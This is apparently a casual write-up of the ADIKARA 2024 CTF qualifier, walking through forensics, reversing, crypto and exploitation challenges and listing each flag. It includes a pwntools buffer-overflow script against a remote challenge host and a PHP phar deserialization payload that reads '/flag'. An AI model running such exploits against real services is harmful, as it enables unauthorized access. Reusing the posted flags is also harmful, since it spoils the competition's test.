# Write Up Penyisihan ADIKARA 2024
## Blaze
this thing took soo long i forgor some part on how to do this
First, i take a look at the source code, and i found that its a .NET app, and it mentions something about blazorpack, so i search on google for more information.
Theres literally no clue, i tried forging the jwt, i tried setting cookies, headers not a single thing stick.
and i remember, its a freaking .NET app, i can use dnSpy!!
So i use dnSpy, but still no luck, no password, no information
until i found out that you need to tick all of the box on the decompiler for it to works
then the username and password just magically appear
Honestly what the hell, this thing took so damn long and i need to check a few boxes?? Oh my god
ADIKARACTF{blaze?_i_think_i_misspelled_blazor_bzbz_5b2055}
## Forensheesh
I got a .har file, i think it contains a browsing history.
https://github.com/W-zrd/Evil-Cropper, its a repo!
It contains a python file, downloaded it, it need cropped.jpg and encrypted_half.bin
Checked the commit history, it has "add important file" commit, and i found half of the flag!
Checked the other commits, and i found the cropped and encrypted half! got it!
ADIKARACTF{so_u_are_familiar_with_har_and_python_huh_GGWP_by_Wzrd}
## Forensweet
An audio file?
Oh its a morse code!
I fount this website that allows you to open morse code in audio format https://morsecode.world/international/decoder/audio-decoder-adaptive.html
welp, i found it
ADIKARACTF{INFODISKONAKHIRTAHUN}
## Overflow 1
Buffer Overflow? Easy! Just put tons of "s" and were done!
ADIKARACTF{OoO_ez_overflow_part_1_1fa032}
## Overflow 2
Another buffer overflow, but now i need to change the variable to 0xdeadbeef, alright, lets do this!
First, i need to find how long do i need to type before the buffer overflow. So I opened python, im gonna use pwntools for this one, and wrote this
```py
from pwn import *
conn = remote("117.53.47.247", 50010)
conn.recvline() ## I Do this several time
conn.send(("s" * 60) + "\n") ## I Do this a lot while testing
```
and i found that the buffer overflows when it reach 72 characters, so i just wrote this:
```py
conn.send((b"s" * 72) + p32(0xdeadbeef) + "\n")
conn.recvline() ## And i got the flag!
```
ADIKARACTF{now_u_know_endianess_right?_94fc1a}
## Snake game
Ahh, a game, 5mb for a such simple game is kinda weird.
Using `strings` against the executable, i found this
Yup, definitely a python to exe kind of thing
Searching on google, i found https://pyinstxtractor-web.netlify.app/, i uploaded the file then i got
well thats a lot of file, but i am very interested with the `snake.pyc`, so i just find other decompiler online and found https://www.pylingual.io/ that can decompile a .pyc file
Welp, that thing is obfuscated, but no worry, there's a lot of deobfuscater online! for example https://pyobfuscate.com/deobf
Putting the source code in and i got the get_flag function
then i just yank that function and put it in python
found it!
ADIKARACTF{pyth0n_is_sn4k3_bzbz_65f623}
## Lambo
Ok... A file to extract a .phar file? wtf even is that?
I found [this](https://stackoverflow.com/questions/38214154/how-do-i-correctly-create-and-then-require-a-phar-file) to create a phar file, then what?
Alright, so from this code, it will load a phar file called `magic_happens_here`. What is that serialize thing?
i looked at [W3School](https://www.w3schools.com/php/func_var_unserialize.asp) to find some more info about this unserialize
i tried this code to test how it works:
```php
<!DOCTYPE html>
<html>
<body>
<?php
class Helper {
public string $file = '/flag';
public function __construct() {}
public function process(): void
{
echo file_get_contents($this->file);
}
}
$a = serialize(new Helper);
var_dump($a);
$aa = unserialize($a);
$aa->process();
var_dump($aa);
?>
</body>
</html>
```
ah, so when unserialized it will basically override the `$file` variable? welp so i just put that and generate the phar, then it outputted
```php
O:6:"Helper":1:{s:4:"file";s:5:"/flag";}
```
Well i dont really know why it formatted like that, but i guess thats just php being php i guess creating the pharr with this
```php
<?php
$phar = new Phar('mylibrary.phar');
$phar->buildFromDirectory('phar/'); // This does the thing you actually want.
$phar->setDefaultStub('magic_happens_here');
```
and upload what it outputted to the website i got this!
ADIKARACTF{this_challenge_was_made_one_hour_ago_be2e51}
## SafeRSA
I always hates encryption :/
ChatGPT spit this out
```py
from Crypto.Util.number import long_to_bytes
from sympy import isprime
from math import isqrt
## Given values
n = 141462798088722051318799729490921841045684289129519401507458481551818501345780972050140869439773419571781243083655675803580035825559100776989995997460352754682544784811123149386346851850688727377614402261954229978269219754312075185083872573296071312565168967164450658906124427063020647048739457948457283284791
e = 65537
c = 95810701202087853841743731093149430655593147683421871799265784567546744027028327006037927756808923742806457516687369724053659801409665809484333704658005178575699287145132631020220338745054190238905155637221474537758319000878100880684173099253778386118547321637286540549815419269314760633502070855820951147798
## Step 1: Factorize n
def factorize_n(n):
for p in range(isqrt(n // 2), isqrt(n)):
if n % p == 0 and isprime(p):
q = n // p
if isprime(q) and q == 2 * p + 1:
return p, q
raise ValueError("Failed to factorize n")
p, q = factorize_n(n)
## Step 2: Compute phi and d
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
## Step 3: Decrypt the ciphertext
m = pow(c, d, n)
plaintext = long_to_bytes(m)
print("Recovered plaintext:", plaintext.decode())
```
ADIKARACTF{info_nilai_kalkulus_brp_bang_90afc2}
Sign in with Wallet
Connect another wallet